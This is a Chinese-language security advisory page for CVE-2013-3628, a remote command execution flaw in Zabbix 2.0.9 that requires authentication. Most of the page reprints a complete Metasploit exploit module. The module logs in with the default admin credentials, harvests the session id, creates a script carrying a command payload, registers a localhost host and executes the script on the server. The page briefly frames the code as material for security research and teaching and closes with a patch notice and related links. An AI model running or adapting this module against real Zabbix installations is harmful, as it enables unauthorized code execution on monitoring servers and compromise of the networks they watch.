发布日期:2013-10-30
更新日期:2013-11-02受影响系统:
ZABBIX ZABBIX v2.0.9
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 63453
CVE(CAN) ID: CVE-2013-3628ZABBIX是一个CS结构的分布式网络监控系统。Zabbix 2.0.9及其他版本允许管理员在主机上运行所创建的脚本,经过身份验证的攻击者可利用此漏洞在主机上允许运行恶意脚本。<*来源:Brandon Perry
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##require "msf/core"class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={})
super(update_info(info,
"Name" => "Zabbix Authenticated Remote Command Execution",
"Description" => %q{
ZABBIX allows an administrator to create scripts that will be run on hosts.
An authenticated attacker can create a script containing a payload, then a host
with an IP of 127.0.0.1 and run the abitrary script on the ZABBIX host. This module was tested againt Zabbix v2.0.9.
},
"License" => MSF_LICENSE,
"Author" =>
[
"Brandon Perry <bperry.volatile[at]gmail.com>" # Discovery / msf module
],
"References" =>
[
["CVE", "2013-3628"],
["URL", "https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"]
],
"Payload" =>
{
"Compat" =>
{
"PayloadType" => "cmd",
"RequiredCmd" => "generic perl ruby bash telnet python",
}
},
"Platform" => ["unix", "linux"],
"Arch" => ARCH_CMD,
"Targets" => [["Automatic",{}]],
"DisclosureDate" => "Oct 30 2013",
"DefaultTarget" => 0
)) register_options(
[
OptString.new("USERNAME", [ true, "Username to authenticate with", "Admin"]),
OptString.new("PASSWORD", [ true, "Password to authenticate with", "zabbix"]),
OptString.new("TARGETURI", [ true, "The URI of the Zabbix installation", "/zabbix/"])
], self.class)
end def check
init = send_request_cgi({
"method" => "GET",
"uri" => normalize_uri(target_uri.path, "/index.php")
}) if !init or init.code != 200
print_error("Could not connect to server")
return Exploit::CheckCode::Unknown
end if init.body =~ /Zabbix (2.0.(d)) Copyright/
if $1 >= "2.0.0" and $1 <= "2.0.8"
print_good("Version #{$1} is vulnerable.")
return Exploit::CheckCode::Vulnerable
end
end
return Exploit::CheckCode::Safe
end def exploit
c = connect req = c.request_cgi({
"method" => "POST",
"uri" => "/zabbix/",
"data" => "request=&name=" << datastore["USERNAME"] << "&password=" << datastore["PASSWORD"] << "&enter=Sign+in"
}) login = c.send_recv(req.to_s.sub("Host:", "Host: " << datastore["RHOST"])) if !login or login.code != 302
fail_with("Login failed")
end sess = login.headers["Set-Cookie"] dash = send_request_cgi({
"method" => "GET",
"uri" => normalize_uri(target_uri.path, "/dashboard.php"),
"cookie" => sess
}) if !dash or dash.code != 200
fail_with("Dashboard failed")
end sid = ""
dash.body.each_line do |line|
if line =~ /&sid=(.{16})">/
sid = $1
break
end
end if sid == ""
fail_with("Could not get sid")
end script_title = rand_text_alpha(18)
post = {
"sid" => sid,
"form_refresh" => 3,
"form" => "Create+script",
"name" => script_title,
"type" => 0,
"execute_on" => 1,
"command" => payload.encoded,
"commandipmi" => "",
"description" => "",
"usrgrpid" => 0,
"groupid" => 0,
"access" => 2,
"save" => "Save"
} resp = send_request_cgi({
"method" => "POST",
"uri" => normalize_uri(target_uri.path, "/scripts.php"),
"vars_post" => post,
"cookie" => sess
}) if !resp or resp.code != 200
fail_with("Error creating script")
end script_id = ""
if resp.body =~ /scriptid=(d{1,8})&sid=#{sid}">#{script_title}/
script_id = $1
else
fail_with("Could not get the script id")
end host = rand_text_alpha(18)
post = {
"sid" => sid,
"form_refresh" => 1,
"form" => "Create+host",
"host" => host,
"visiblename" => host,
"groups_left" => 4,
"newgroup" => "",
"interfaces[1][isNew]" => true,
"interfaces[1][interfaceid]" => 1,
"interfaces[1][type]" => 1,
"interfaces[1][ip]" => "127.0.0.1",
"interfaces[1][dns]" => "",
"interfaces[1][useip]" => 1,
"interfaces[1][port]" => 10050,
"mainInterfaces[1]" => 1,
"proxy_hostid" => 0,
"status" => 0,
"ipmi_authtype" => -1,
"ipmi_privilege" => 2,
"ipmi_username" => "",
"ipmi_password" => "",
"macros[0][macro]" => "",
"macros[0][value]" => "",
"inventory_mode" => -1,
"save" => "Save",
"groups[4]" => 4
} resp = send_request_cgi({
"method" => "POST",
"uri" => normalize_uri(target_uri.path, "/hosts.php"),
"vars_post" => post,
"cookie" => sess
}) if !resp or resp.code != 200
fail_with("Error creating new host")
end hostid = ""
if resp.body =~ /hosts.php?form=update&hostid=(d{1,12})&groupid=(d)&sid=#{sid}">#{host}/
hostid = $1
else
fail_with("Could not get the host id")
end send_request_cgi({
"method" => "GET",
"uri" => normalize_uri(target_uri.path, "/scripts_exec.php?execute=1&hostid=#{hostid}&scriptid=#{script_id}&sid=#{sid}"),
"cookie" => sess
})
end
end建议:
--------------------------------------------------------------------------------
厂商补丁:ZABBIX
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
ZABBIX 的详细介绍:请点这里
ZABBIX 的下载地址:请点这里
相关阅读:安装部署分布式监控系统Zabbix 2.06 http://www.linuxidc.com/Linux/2013-07/86942.htm《安装部署分布式监控系统Zabbix 2.06》 http://www.linuxidc.com/Linux/2013-07/86942.htmCentOS 6.3下Zabbix安装部署 http://www.linuxidc.com/Linux/2013-05/83786.htmZabbix分布式监控系统实践 http://www.linuxidc.com/Linux/2013-06/85758.htmCentOS 6.3下Zabbix监控apache server-status http://www.linuxidc.com/Linux/2013-05/84740.htmCentOS 6.3下Zabbix监控MySQL数据库参数 http://www.linuxidc.com/Linux/2013-05/84800.htm Varnish Cache远程拒绝服务漏洞(CVE-2013-4484)Netgear WNDR3700安全限制绕过漏洞相关资讯 ZABBIX ZABBIX漏洞
- Zabbix jsrpc.php profileIdx2参数 (08月20日)
- 生产环境下Zabbix 2.4升级Zabbix 3 (04月18日)
- Zabbix2.4.5迁移到Zabbix3.0 (03月29日)
| - CentOS6.5下Zabbix安装使用学习系 (07月21日)
- 关于Zabbix一些高级功能 (04月12日)
- ZABBIX 3.0.0beta2 发布下载,分布 (01月30日)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站